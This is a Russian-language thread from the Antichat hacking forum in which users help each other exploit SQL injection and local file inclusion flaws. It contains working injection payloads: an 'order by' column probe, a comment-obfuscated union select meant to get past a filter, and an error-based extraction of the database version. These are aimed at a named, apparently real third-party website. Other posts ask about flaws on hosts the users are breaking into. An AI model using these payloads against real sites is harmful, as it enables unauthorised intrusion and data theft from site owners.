ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.02.2011, 23:40
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от asql
asql said:
Если кому нибуть не в лом, из знатоков, прошу объяснить новичку элементарную вещь.
При простом заросе в базу данных типа:
$db=mysql_query("SELECT * FROM table WHERE id='$_GET['id']' ");
$db=mysql_fetch_array($db);
и при вводе в url адреса http://site.ru/index.php?id=1' выдает ошибкуWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in...
...и дальше не идет...
тоесть при вводе http://site.ru/index.php?id=1'+order+by+1--
все равно выдает ошибку...
Казалось бы золотая sql'ka, но разобратся с этим ни как не могу.
Заранее спс!
Не знаю, что и куда ты там вводишь, но твой скрипт даже не запуститься, потому что он синтаксически неверен.
Правильно:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM table WHERE id=' "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" ' "[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Эксплуатация:
Код HTML:
HTML:
1' order by 1,2,3,4,5,6,7,8,9,10-- a
И так далее.
Ну и magic_quotes должны быть off соответственно.
|
|
|
22.02.2011, 00:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
8829
Репутация:
-3
|
|
1' order by 1,2,3,4,5,6,7,8,9,10-- a
а 'a' на конце зачем?
|
|
|
|
22.02.2011, 00:05
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от asql
asql said:
1' order by 1,2,3,4,5,6,7,8,9,10-- a
а 'a' на конце зачем?
Не важно, что там стоит, я просто показал, что после знака комментария должен стоять пробел.
|
|
|
|
22.02.2011, 01:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
225312
Репутация:
-6
|
|
Warning: include(/var/www/xxxx.com/1\'.php) [function.include]: failed to open stream: No such file or directory in /var/www/xxx/index.php on line 34
Warning: include() [function.include]: Failed opening '/var/www/xxxxx.com/1\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/xxxx.com/index.php on line 34
что ето за ошибка обьесните плиз и чт можно зделать?
|
|
|
|
22.02.2011, 02:22
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799
Репутация:
62
|
|
Сообщение от boortyhuhtyu
boortyhuhtyu said:
Warning: include(/var/www/xxxx.com/1\'.php) [function.include]: failed to open stream: No such file or directory in /var/www/xxx/index.php on line 34
Warning: include() [function.include]: Failed opening '/var/www/xxxxx.com/1\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/xxxx.com/index.php on line 34
что ето за ошибка обьесните плиз и чт можно зделать?
local file include (LFI )
|
|
|
|
22.02.2011, 18:41
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Народ помогите разобраться стакой скулей:
_http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&sitei d=-9+union+select+1,2,3-- //выводит Error processing request
но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...
|
|
|
|
22.02.2011, 18:53
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от winstrool
winstrool said:
Народ помогите разобраться стакой скулей:
_http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&sitei d=-9+union+select+1,2,3-- //выводит Error processing request
но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...
там стоит фильтрация или фаервол какой-нибудь, так что нужно знать как обходить эти фильтры. Тема поднималась сто раз, так что ищем. Ну я думаю если найдёшь и обойдёшь, то узнаешь что там несколько запросов на странице, значит нужен вывод через ошибку, так что ищем сразу же вывод через ошибку
|
|
|
|
22.02.2011, 18:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от winstrool
winstrool said:
Народ помогите разобраться стакой скулей:
_http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&sitei d=-9+union+select+1,2,3-- //выводит Error processing request
но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...
обходится спокойно, но через юнион селект не крутится
http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&sitei d=9+/*!union*/+select+1,2,3
так что error based
http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&sitei d=9+or+1+group+by+concat+(version(),floor(rand(0)* 2))having+min(0)+or+1
|
|
|
|
22.02.2011, 20:29
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
есть ли на ломаемых хостах какая нить альтернатива gcc
|
|
|
|
23.02.2011, 07:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
подскажите если при подставлении кавычки скажем
something.php?blabla=asd' показывает страницу something.php как эту уязвимость эксплуатировать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
